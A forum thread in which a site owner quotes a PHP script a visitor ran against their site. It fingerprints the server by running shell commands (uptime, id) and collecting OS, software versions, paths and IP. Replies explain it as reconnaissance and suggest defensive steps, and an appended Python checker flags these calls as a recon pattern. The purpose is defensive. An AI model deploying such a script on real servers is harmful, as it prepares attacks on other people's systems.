Firstly, I do not know if this is the right section to post in; sorry if it is not, and could you please move it to the right section. Thank you. I have a tracking system on one of my sites, and I have a guy trying to do something strange; he is running this code on my URL:

```php
<?php
function ConvertBytes($number) {
    $len = strlen($number);
    if($len < 4) { return sprintf("%d b", $number); }
    if($len >= 4 && $len <=6) { return sprintf("%0.2f Kb", $number/1024); }
    if($len >= 7 && $len <=9) { return sprintf("%0.2f Mb", $number/1024/1024); }
    return sprintf("%0.2f Gb", $number/1024/1024/1024);
}
echo "JaheeM<br>";
$un = @php_uname();
$up = system(uptime);
$id1 = system(id);
$pwd1 = @getcwd();
$sof1 = getenv("SERVER_SOFTWARE");
$php1 = phpversion();
$name1 = $_SERVER['SERVER_NAME'];
$ip1 = gethostbyname($SERVER_ADDR);
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;
echo "JaheeM<br>";
echo "uname -a: $un<br>";
echo "os: $os<br>";
echo "uptime: $up<br>";
echo "id: $id1<br>";
echo "pwd: $pwd1<br>";
echo "php: $php1<br>";
echo "software: $sof1<br>";
echo "server-name: $name1<br>";
echo "server-ip: $ip1<br>";
echo "free: $free<br>";
echo "used: $used<br>";
echo "total: $all<br>";
exit;
```

Any idea what he is trying to do?
I know very little about PHP... but I guess he may be trying to hack the password of JaheeM (maybe this is a username).
He's getting the versions and names of the software installed on the server, perhaps hoping for a version of one of the software packages that has vulnerabilities he can exploit. He's also getting all the info he needs to exploit most vulnerabilities in installed software that this would also find. If you mean he's already run it, then check there are no updated versions for any of the software on your server (that don't introduce new vulnerabilities). Also try looking up his IP to find his ISP and complaining to them about his hacking (preparation). Assuming he wasn't using a proxy just then, you might be able to persuade them to talk to/cut him off about it. infohq.com/Computer/Spam/finding-hackers-isp-using-ip-address.htm has some instructions for how to do that. (If the email lines are not returned, just find contact emails on the ISP's website).
I am going to look into this further; I am already in the process of talking to my host about this issue. I am really thankful for your reply. Regards, Aceuk.
Yeah, definitely not legit, he's trying to get information about your site and server so that he can do something malicious. Make sure you deny him access to your site and talk to the ISP.
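As an added example (not part of the original thread), the reply above that explains the script is collecting software names and versions can be turned into a small triage check for PHP text captured by a tracking log or found in the web root. The function name, severity labels and the three-call threshold are assumptions of this example; the sample input is a constructed excerpt of the script quoted in the first post.

```python
import re

# Calls that appear in the posted script, mapped to what each one discloses.
# The "info"/"exec" labels are this example's own classification.
RECON_CALLS = {
    "php_uname": ("kernel and OS build", "info"),
    "phpversion": ("PHP version", "info"),
    "getcwd": ("filesystem path of the web root", "info"),
    "getenv": ("server environment, e.g. SERVER_SOFTWARE", "info"),
    "gethostbyname": ("server IP address", "info"),
    "diskfreespace": ("free disk space", "info"),
    "disk_total_space": ("total disk size", "info"),
    "system": ("runs a shell command (uptime, id)", "exec"),
}

# Optional '@' error suppressor, whole-word function name, then '('.
CALL_RE = re.compile(r"@?\b(" + "|".join(RECON_CALLS) + r")\s*\(", re.IGNORECASE)

def triage(php_source, threshold=3):
    """Return (findings, verdict); findings are (line, call, kind, discloses)."""
    findings = []
    for lineno, line in enumerate(php_source.splitlines(), 1):
        for m in CALL_RE.finditer(line):
            name = m.group(1).lower()  # PHP function names are case-insensitive
            what, kind = RECON_CALLS[name]
            findings.append((lineno, name, kind, what))
    distinct = {f[1] for f in findings}
    has_exec = any(f[2] == "exec" for f in findings)
    if len(distinct) < threshold:
        verdict = "below-threshold"  # a single getcwd() is normal application code
    else:
        verdict = "recon-with-exec" if has_exec else "recon"
    return findings, verdict

# Constructed excerpt of the script from the first post.
SAMPLE = '''$un = @php_uname();
$up = system(uptime);
$id1 = system(id);
$pwd1 = @getcwd();
$sof1 = getenv("SERVER_SOFTWARE");
$php1 = phpversion();
'''
# Constructed benign snippet for comparison.
BENIGN = '$root = getcwd();\necho "ok";\n'

if __name__ == "__main__":
    hits, verdict = triage(SAMPLE)
    for lineno, name, kind, what in hits:
        print(f"line {lineno}: {name} [{kind}] discloses {what}")
    print("verdict:", verdict)
```

A "recon-with-exec" verdict on text that arrived in a request is a reason to check whether the request actually executed, since the `system` calls only return output if the server ran the code.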